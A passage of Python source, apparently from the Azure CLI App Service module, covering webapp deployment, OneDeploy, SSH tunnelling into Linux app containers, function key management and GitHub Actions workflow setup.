logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, loc)
logger.warning("Resource group creation complete")
# create ASP
logger.warning("Creating AppServicePlan '%s' ...", plan)
# we will always call the ASP create or update API so that in case of re-deployment, if the SKU or plan setting are
# updated we update those
try:
create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
number_of_workers=1 if _is_linux else None, location=loc,
app_service_environment=app_service_environment)
except Exception as ex: # pylint: disable=broad-except
if ex.response.status_code == 409: # catch 409 conflict when trying to create existing ASP in diff location
try:
response_content = json.loads(ex.response._content.decode('utf-8')) # pylint: disable=protected-access
except Exception: # pylint: disable=broad-except
raise CLIInternalError(ex)
raise UnclassifiedUserFault(response_content['error']['message'])
raise AzureResponseError(ex)
if _create_new_app:
logger.warning("Creating webapp '%s' ...", name)
create_webapp(cmd, rg_name, name, plan, runtime_version if not html else None,
using_webapp_up=True, language=language)
_configure_default_logging(cmd, rg_name, name)
else: # for existing app if we might need to update the stack runtime settings
helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
match = helper.resolve(runtime_version)
if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
if match and site_config.linux_fx_version != match['configs']['linux_fx_version']:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, match['configs']['linux_fx_version'])
update_site_configs(cmd, rg_name, name, linux_fx_version=match['configs']['linux_fx_version'])
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif not match:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif os_name.lower() == 'windows':
# may need to update stack runtime settings. For node its site_config.app_settings, otherwise site_config
if match:
_update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version)
create_json['runtime_version'] = runtime_version
# Zip contents & Deploy
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
if launch_browser:
logger.warning("Launching app using default browser")
view_in_browser(cmd, rg_name, name, None, logs)
else:
_url = _get_url(cmd, rg_name, name)
logger.warning("You can launch the app at %s", _url)
create_json.update({'URL': _url})
if logs:
_configure_default_logging(cmd, rg_name, name)
return get_streaming_log(cmd, rg_name, name)
with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
cmd.cli_ctx.config.set_value('defaults', 'location', loc)
cmd.cli_ctx.config.set_value('defaults', 'web', name)
return create_json
def _update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version):
update_needed = False
if 'node' in runtime_version:
settings = []
for k, v in match['configs'].items():
for app_setting in site_config.app_settings:
if app_setting.name == k and app_setting.value != v:
update_needed = True
settings.append('%s=%s', k, v)
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_app_settings(cmd, rg_name, name, settings=settings, slot=None, slot_settings=None)
else:
for k, v in match['configs'].items():
if getattr(site_config, k, None) != v:
update_needed = True
setattr(site_config, k, v)
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_site_configs(cmd,
rg_name,
name,
net_framework_version=site_config.net_framework_version,
php_version=site_config.php_version,
python_version=site_config.python_version,
java_version=site_config.java_version,
java_container=site_config.java_container,
java_container_version=site_config.java_container_version)
current_stack = get_current_stack_from_runtime(runtime_version)
_update_webapp_current_stack_property_if_needed(cmd, rg_name, name, current_stack)
if update_needed:
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
def _update_webapp_current_stack_property_if_needed(cmd, resource_group, name, current_stack):
if not current_stack:
return
# portal uses this current_stack value to display correct runtime for windows webapps
client = web_client_factory(cmd.cli_ctx)
app_metadata = client.web_apps.list_metadata(resource_group, name)
if 'CURRENT_STACK' not in app_metadata.properties or app_metadata.properties["CURRENT_STACK"] != current_stack:
app_metadata.properties["CURRENT_STACK"] = current_stack
client.web_apps.update_metadata(resource_group, name, metadata=app_metadata)
def _ping_scm_site(cmd, resource_group, name, instance=None):
from azure.cli.core.util import should_disable_connection_verify
# wake up kudu, by making an SCM call
import requests
# work around until the timeout limits issue for linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
cookies = {}
if instance is not None:
cookies['ARRAffinity'] = instance
requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify(),
cookies=cookies)
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None, instance=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
# Validate that we have a known instance (case-sensitive)
if instance is not None:
instances = list_instances(cmd, resource_group_name, name, slot=slot)
instance_names = set(i.name for i in instances)
if instance not in instance_names:
if slot is not None:
raise CLIError("The provided instance '{}' is not valid for this webapp and slot.".format(instance))
raise CLIError("The provided instance '{}' is not valid for this webapp.".format(instance))
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password, instance)
_ping_scm_site(cmd, resource_group_name, name, instance=instance)
_wait_for_webapp(tunnel_server)
return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
else:
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.is_alive():
time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
if timeout:
time.sleep(int(timeout))
else:
while s.is_alive() and t.is_alive():
time.sleep(5)
def perform_onedeploy(cmd,
resource_group_name,
name,
src_path=None,
src_url=None,
target_path=None,
artifact_type=None,
is_async=None,
restart=None,
clean=None,
ignore_stack=None,
timeout=None,
slot=None):
params = OneDeployParams()
params.cmd = cmd
params.resource_group_name = resource_group_name
params.webapp_name = name
params.src_path = src_path
params.src_url = src_url
params.target_path = target_path
params.artifact_type = artifact_type
params.is_async_deployment = is_async
params.should_restart = restart
params.is_clean_deployment = clean
params.should_ignore_stack = ignore_stack
params.timeout = timeout
params.slot = slot
return _perform_onedeploy_internal(params)
# Class for OneDeploy parameters
# pylint: disable=too-many-instance-attributes,too-few-public-methods
class OneDeployParams:
def __init__(self):
self.cmd = None
self.resource_group_name = None
self.webapp_name = None
self.src_path = None
self.src_url = None
self.artifact_type = None
self.is_async_deployment = None
self.target_path = None
self.should_restart = None
self.is_clean_deployment = None
self.should_ignore_stack = None
self.timeout = None
self.slot = None
# pylint: enable=too-many-instance-attributes,too-few-public-methods
def _build_onedeploy_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
deploy_url = scm_url + '/api/publish?type=' + params.artifact_type
if params.is_async_deployment is not None:
deploy_url = deploy_url + '&async=' + str(params.is_async_deployment)
if params.should_restart is not None:
deploy_url = deploy_url + '&restart=' + str(params.should_restart)
if params.is_clean_deployment is not None:
deploy_url = deploy_url + '&clean=' + str(params.is_clean_deployment)
if params.should_ignore_stack is not None:
deploy_url = deploy_url + '&ignorestack=' + str(params.should_ignore_stack)
if params.target_path is not None:
deploy_url = deploy_url + '&path=' + params.target_path
return deploy_url
def _get_onedeploy_status_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
return scm_url + '/api/deployments/latest'
def _get_basic_headers(params):
import urllib3
user_name, password = _get_site_credential(params.cmd.cli_ctx, params.resource_group_name,
params.webapp_name, params.slot)
if params.src_path:
content_type = 'application/octet-stream'
elif params.src_url:
content_type = 'application/json'
else:
raise CLIError('Unable to determine source location of the artifact being deployed')
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
headers['Content-Type'] = content_type
return headers
def _get_onedeploy_request_body(params):
import os
if params.src_path:
logger.info('Deploying from local path: %s', params.src_path)
try:
with open(os.path.realpath(os.path.expanduser(params.src_path)), 'rb') as fs:
body = fs.read()
except Exception as e: # pylint: disable=broad-except
raise CLIError("Either '{}' is not a valid local file path or you do not have permissions to access it"
.format(params.src_path)) from e
elif params.src_url:
logger.info('Deploying from URL: %s', params.src_url)
body = json.dumps({
"packageUri": params.src_url
})
else:
raise CLIError('Unable to determine source location of the artifact being deployed')
return body
def _update_artifact_type(params):
import ntpath
if params.artifact_type is not None:
return
# Interpret deployment type from the file extension if the type parameter is not passed
file_name = ntpath.basename(params.src_path)
file_extension = file_name.split(".", 1)[1]
if file_extension in ('war', 'jar', 'ear', 'zip'):
params.artifact_type = file_extension
elif file_extension in ('sh', 'bat'):
params.artifact_type = 'startup'
else:
params.artifact_type = 'static'
logger.warning("Deployment type: %s. To override deloyment type, please specify the --type parameter. "
"Possible values: war, jar, ear, zip, startup, script, static", params.artifact_type)
def _make_onedeploy_request(params):
import requests
from azure.cli.core.util import (
should_disable_connection_verify,
)
# Build the request body, headers, API URL and status URL
body = _get_onedeploy_request_body(params)
headers = _get_basic_headers(params)
deploy_url = _build_onedeploy_url(params)
deployment_status_url = _get_onedeploy_status_url(params)
logger.info("Deployment API: %s", deploy_url)
response = requests.post(deploy_url, data=body, headers=headers, verify=not should_disable_connection_verify())
# For debugging purposes only, you can change the async deployment into a sync deployment by polling the API status
# For that, set poll_async_deployment_for_debugging=True
poll_async_deployment_for_debugging = True
# check the status of async deployment
if response.status_code == 202 or response.status_code == 200:
response_body = None
if poll_async_deployment_for_debugging:
logger.info('Polling the status of async deployment')
response_body = _check_zip_deployment_status(params.cmd, params.resource_group_name, params.webapp_name,
deployment_status_url, headers, params.timeout)
logger.info('Async deployment complete. Server response: %s', response_body)
return response_body
# API not available yet!
if response.status_code == 404:
raise CLIError("This API isn't available in this environment yet!")
# check if there's an ongoing process
if response.status_code == 409:
raise CLIError("Another deployment is in progress. Please wait until that process is complete before "
"starting a new deployment. You can track the ongoing deployment at {}"
.format(deployment_status_url))
# check if an error occured during deployment
if response.status_code:
raise CLIError("An error occured during deployment. Status Code: {}, Details: {}"
.format(response.status_code, response.text))
# OneDeploy
def _perform_onedeploy_internal(params):
# Update artifact type, if required
_update_artifact_type(params)
# Now make the OneDeploy API call
logger.info("Initiating deployment")
response = _make_onedeploy_request(params)
logger.info("Deployment has completed successfully")
return response
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError('SSH timeout, your app must be running before'
' it can accept SSH connections. '
'Use `az webapp log tail` to review the app startup logs.')
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
c.run('cat /etc/motd', pty=True)
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None): # pylint: disable=too-many-statements
import platform
if platform.system() == "Windows":
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise ValidationError("Only Linux App Service Plans supported, found a Windows App Service Plan")
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
open_page_in_browser(scm_url + '/webssh/host')
else:
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
raise ValidationError('Remote debugging is enabled, please disable')
create_tunnel_and_session(
cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout, instance=instance)
def create_devops_pipeline(
cmd,
functionapp_name=None,
organization_name=None,
project_name=None,
repository_name=None,
overwrite_yaml=None,
allow_force_push=None,
github_pat=None,
github_repository=None
):
from .azure_devops_build_interactive import AzureDevopsBuildInteractive
azure_devops_build_interactive = AzureDevopsBuildInteractive(cmd, logger, functionapp_name,
organization_name, project_name, repository_name,
overwrite_yaml, allow_force_push,
github_pat, github_repository)
return azure_devops_build_interactive.interactive_azure_devops_build()
def _configure_default_logging(cmd, rg_name, name):
logger.warning("Configuring default logging for the app, if not already enabled")
return config_diagnostics(cmd, rg_name, name,
application_logging=True, web_server_logging='filesystem',
docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
ase_is_id = is_valid_resource_id(ase)
if ase_is_id:
return ase
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Web',
type='hostingEnvironments',
name=ase)
def _validate_asp_sku(app_service_environment, sku):
# Isolated SKU is supported only for ASE
if sku.upper() in ['I1', 'I2', 'I3', 'I1V2', 'I2V2', 'I3V2']:
if not app_service_environment:
raise CLIError("The pricing tier 'Isolated' is not allowed for this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/azure/app-service/overview-hosting-plans")
else:
if app_service_environment:
raise CLIError("Only pricing tier 'Isolated' is allowed in this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/azure/app-service/overview-hosting-plans")
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
key_vault_is_id = is_valid_resource_id(key_vault)
if key_vault_is_id:
return key_vault
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.KeyVault',
type='vaults',
name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_host_name_bindings', slot)
verified_hostname_found = False
for hostname_binding in hostname_bindings:
binding_name = hostname_binding.name.split('/')[-1]
if binding_name.lower() == hostname and (hostname_binding.host_name_type == 'Verified' or
hostname_binding.host_name_type == 'Managed'):
verified_hostname_found = True
return verified_hostname_found
def update_host_key(cmd, resource_group_name, name, key_type, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
key_info = KeyInfo(name=key_name, value=key_value)
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_host_secret_slot(resource_group_name,
name,
key_type,
key_name,
slot, key=key_info)
return client.web_apps.create_or_update_host_secret(resource_group_name,
name,
key_type,
key_name, key=key_info)
def list_host_keys(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_host_keys_slot(resource_group_name, name, slot)
return client.web_apps.list_host_keys(resource_group_name, name)
def delete_host_key(cmd, resource_group_name, name, key_type, key_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_host_secret_slot(resource_group_name, name, key_type, key_name, slot)
return client.web_apps.delete_host_secret(resource_group_name, name, key_type, key_name)
def show_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.get_function(resource_group_name, name, function_name)
if result is None:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def delete_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.delete_function(resource_group_name, name, function_name)
return result
def update_function_key(cmd, resource_group_name, name, function_name, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
key_info = KeyInfo(name=key_name, value=key_value)
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_function_secret_slot(resource_group_name,
name,
function_name,
key_name,
slot,
key_info)
return client.web_apps.create_or_update_function_secret(resource_group_name,
name,
function_name,
key_name,
key_info)
def list_function_keys(cmd, resource_group_name, name, function_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_function_keys_slot(resource_group_name, name, function_name, slot)
return client.web_apps.list_function_keys(resource_group_name, name, function_name)
def delete_function_key(cmd, resource_group_name, name, key_name, function_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_function_secret_slot(resource_group_name, name, function_name, key_name, slot)
return client.web_apps.delete_function_secret(resource_group_name, name, function_name, key_name)
def add_github_actions(cmd, resource_group, name, repo, runtime=None, token=None, slot=None, # pylint: disable=too-many-statements,too-many-branches
branch='master', login_with_github=False, force=False):
if not token and not login_with_github:
raise_missing_token_suggestion()
elif not token:
scopes = ["admin:repo_hook", "repo", "workflow"]
token = get_github_access_token(cmd, scopes)
elif token and login_with_github:
logger.warning("Both token and --login-with-github flag are provided. Will use provided token")
# Verify resource group, app
site_availability = get_site_availability(cmd, name)
if site_availability.name_available or (not site_availability.name_available and
site_availability.reason == 'Invalid'):
raise ResourceNotFoundError(
"The Resource 'Microsoft.Web/sites/%s' under resource group '%s' "
"was not found." % (name, resource_group))
app_details = get_app_details(cmd, name)
if app_details is None:
raise ResourceNotFoundError(
"Unable to retrieve details of the existing app %s. Please check that the app is a part of "
"the current subscription" % name)
current_rg = app_details.resource_group
if resource_group is not None and (resource_group.lower() != current_rg.lower()):
raise ResourceNotFoundError("The webapp %s exists in ResourceGroup %s and does not match the "
"value entered %s. Please re-run command with the correct "
"parameters." % (name, current_rg, resource_group))
parsed_plan_id = parse_resource_id(app_details.server_farm_id)
client = web_client_factory(cmd.cli_ctx)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
is_linux = plan_info.reserved
# Verify github repo
from github import Github, GithubException
from github.GithubException import BadCredentialsException, UnknownObjectException
if repo.strip()[-1] == '/':
repo = repo.strip()[:-1]
g = Github(token)
github_repo = None
try:
github_repo = g.get_repo(repo)
try:
github_repo.get_branch(branch=branch)
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
logger.warning('Verified GitHub repo and branch')
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} repo".format(repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Verify runtime
app_runtime_info = _get_app_runtime_info(
cmd=cmd, resource_group=resource_group, name=name, slot=slot, is_linux=is_linux)
app_runtime_string = None
if(app_runtime_info and app_runtime_info['display_name']):
app_runtime_string = app_runtime_info['display_name']
github_actions_version = None
if (app_runtime_info and app_runtime_info['github_actions_version']):
github_actions_version = app_runtime_info['github_actions_version']
if runtime and app_runtime_string:
if app_runtime_string.lower() != runtime.lower():
logger.warning('The app runtime: {app_runtime_string} does not match the runtime specified: '
'{runtime}. Using the specified runtime {runtime}.')
app_runtime_string = runtime
elif runtime:
app_runtime_string = runtime
if not app_runtime_string:
raise CLIError('Could not detect runtime. Please specify using the --runtime flag.')
if not _runtime_supports_github_actions(runtime_string=app_runtime_string, is_linux=is_linux):
raise CLIError("Runtime %s is not supported for GitHub Actions deployments." % app_runtime_string)
# Get workflow template
logger.warning('Getting workflow template using runtime: %s', app_runtime_string)
workflow_template = _get_workflow_template(github=g, runtime_string=app_runtime_string, is_linux=is_linux)
# Fill workflow template
guid = str(uuid.uuid4()).replace('-', '')
publish_profile_name = "AzureAppService_PublishProfile_{}".format(guid)
logger.warning(
'Filling workflow template with name: %s, branch: %s, version: %s, slot: %s',
name, branch, github_actions_version, slot if slot else 'production')
completed_workflow_file = _fill_workflow_template(content=workflow_template.decoded_content.decode(), name=name,
branch=branch, slot=slot, publish_profile=publish_profile_name,
version=github_actions_version)
completed_workflow_file = completed_workflow_file.encode()
# Check if workflow exists in repo, otherwise push
if slot:
file_name = "{}_{}({}).yml".format(branch.replace('/', '-'), name.lower(), slot)
else:
file_name = "{}_{}.yml".format(branch.replace('/', '-'), name.lower())
dir_path = "{}/{}".format('.github', 'workflows')
file_path = "/{}/{}".format(dir_path, file_name)
try:
existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch)
existing_publish_profile_name = _get_publish_profile_from_workflow_file(
workflow_file=str(existing_workflow_file.decoded_content))
if existing_publish_profile_name:
completed_workflow_file = completed_workflow_file.decode()
completed_workflow_file = completed_workflow_file.replace(
publish_profile_name, existing_publish_profile_name)
completed_workflow_file = completed_workflow_file.encode()
publish_profile_name = existing_publish_profile_name
logger.warning("Existing workflow file found")
if force:
logger.warning("Replacing the existing workflow file")
github_repo.update_file(path=file_path, message="Update workflow using Azure CLI",
content=completed_workflow_file, sha=existing_workflow_file.sha, branch=branch)
else:
option = prompt_y_n('Replace existing workflow file?')
if option:
logger.warning("Replacing the existing workflow file")
github_repo.update_file(path=file_path, message="Update workflow using Azure CLI",
content=completed_workflow_file, sha=existing_workflow_file.sha,
branch=branch)
else:
logger.warning("Use the existing workflow file")
if existing_publish_profile_name:
publish_profile_name = existing_publish_profile_name
except UnknownObjectException:
logger.warning("Creating new workflow file: %s", file_path)
github_repo.create_file(path=file_path, message="Create workflow using Azure CLI",
content=completed_workflow_file, branch=branch)
# Add publish profile to GitHub
logger.warning('Adding publish profile to GitHub')
_add_publish_profile_to_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo,
token=token, github_actions_secret_name=publish_profile_name,
slot=slot)
# Set site source control properties
_update_site_source_control_properties_for_gh_action(
cmd=cmd, resource_group=resource_group, name=name, token=token, repo=repo, branch=branch, slot=slot)
github_actions_url = "https://github.com/{}/actions".format(repo)
return github_actions_url
def remove_github_actions(cmd, resource_group, name, repo, token=None, slot=None, # pylint: disable=too-many-statements
branch='master', login_with_github=False):
if not token and not login_with_github:
raise_missing_token_suggestion()
elif not token:
scopes = ["admin:repo_hook", "repo", "workflow"]
token = get_github_access_token(cmd, scopes)
elif token and login_with_github:
logger.warning("Both token and --login-with-github flag are provided. Will use provided token")
# Verify resource group, app
site_availability = get_site_availability(cmd, name)
if site_availability.name_available or (not site_availability.name_available and
site_availability.reason == 'Invalid'):
raise CLIError("The Resource 'Microsoft.Web/sites/%s' under resource group '%s' was not found." %
(name, resource_group))
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app %s. "
"Please check that the app is a part of the current subscription" % name)
current_rg = app_details.resource_group
if resource_group is not None and (resource_group.lower() != current_rg.lower()):
raise CLIError("The webapp %s exists in ResourceGroup %s and does not match "
"the value entered %s. Please re-run command with the correct "
"parameters." % (name, current_rg, resource_group))
# Verify github repo
from github import Github, GithubException
from github.GithubException import BadCredentialsException, UnknownObjectException
if repo.strip()[-1] == '/':
repo = repo.strip()[:-1]
g = Github(token)
github_repo = None
try:
github_repo = g.get_repo(repo)
try:
github_repo.get_branch(branch=branch)
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
logger.warning('Verified GitHub repo and branch')
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} repo".format(repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Check if workflow exists in repo and remove
file_name = "{}_{}({}).yml".format(
branch.replace('/', '-'), name.lower(), slot) if slot else "{}_{}.yml".format(
branch.replace('/', '-'), name.lower())
dir_path = "{}/{}".format('.github', 'workflows')
file_path = "/{}/{}".format(dir_path, file_name)
existing_publish_profile_name = None
try:
existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch)
existing_publish_profile_name = _get_publish_profile_from_workflow_file(
workflow_file=str(existing_workflow_file.decoded_content))
logger.warning("Removing the existing workflow file")
github_repo.delete_file(path=file_path, message="Removing workflow file, disconnecting github actions",
sha=existing_workflow_file.sha, branch=branch)
except UnknownObjectException as e:
error_msg = "Error when removing workflow file."
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Remove publish profile from GitHub
if existing_publish_profile_name:
logger.warning('Removing publish profile from GitHub')
_remove_publish_profile_from_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo, token=token,
github_actions_secret_name=existing_publish_profile_name, slot=slot)
# Remove site source control properties
delete_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
return "Disconnected successfully."
def _get_publish_profile_from_workflow_file(workflow_file):
import re
publish_profile = None
regex = re.search(r'publish-profile: \$\{\{ secrets\..*?\}\}', workflow_file)
if regex:
publish_profile = regex.group()
publish_profile = publish_profile.replace('publish-profile: ${{ secrets.', '')
publish_profile = publish_profile[:-2]
if publish_profile:
return publish_profile.strip()
return None
def _update_site_source_control_properties_for_gh_action(cmd, resource_group, name, token, repo=None,
branch="master", slot=None):
if repo:
repo_url = 'https://github.com/' + repo
else:
repo_url = None
site_source_control = show_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
if site_source_control:
if not repo_url:
repo_url = site_source_control.repo_url
delete_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
config_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
repo_url=repo_url,
repository_type='github',
github_action=True,
branch=branch,
git_token=token,
slot=slot)
def _get_workflow_template(github, runtime_string, is_linux):
from github import GithubException
from github.GithubException import BadCredentialsException
file_contents = None
template_repo_path = 'Azure/actions-workflow-templates'
template_file_path = _get_template_file_path(runtime_string=runtime_string, is_linux=is_linux)
try:
template_repo = github.get_repo(template_repo_path)
file_contents = template_repo.get_contents(template_file_path)
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when retrieving workflow template"
if e.data and e.data['message']:
error_msg += ": {}".format(e.data['message'])
raise CLIError(error_msg)
return file_contents
def _fill_workflow_template(content, name, branch, slot, publish_profile, version):
if not slot:
slot = 'production'
content = content.replace('${web-app-name}', name)
content = content.replace('${branch}', branch)
content = content.replace('${slot-name}', slot)
content = content.replace('${azure-webapp-publish-profile-name}', publish_profile)
content = content.replace('${AZURE_WEBAPP_PUBLISH_PROFILE}', publish_profile)
content = content.replace('${dotnet-core-version}', version)
content = content.replace('${java-version}', version)
content = content.replace('${node-version}', version)
content = content.replace('${python-version}', version)
return content
def _get_template_file_path(runtime_string, is_linux):
if not runtime_string:
raise CLIError('Unable to retrieve workflow template')
runtime_string = runtime_string.lower()
runtime_stack = runtime_string.split('|')[0]
template_file_path = None
if is_linux:
template_file_path = LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None)
else:
# Handle java naming
if runtime_stack == 'java':
java_container_split = runtime_string.split('|')
if java_container_split and len(java_container_split) >= 2:
if java_container_split[2] == 'tomcat':
runtime_stack = 'tomcat'
elif java_container_split[2] == 'java se':
runtime_stack = 'java'
template_file_path = WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None)
if not template_file_path:
raise CLIError('Unable to retrieve workflow template.')
return template_file_path
def _add_publish_profile_to_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None):
# Get publish profile with secrets
import requests
logger.warning("Fetching publish profile with secrets for the app '%s'", name)
publish_profile_bytes = _generic_site_operation(
cmd.cli_ctx, resource_group, name, 'list_publishing_profile_xml_with_secrets',
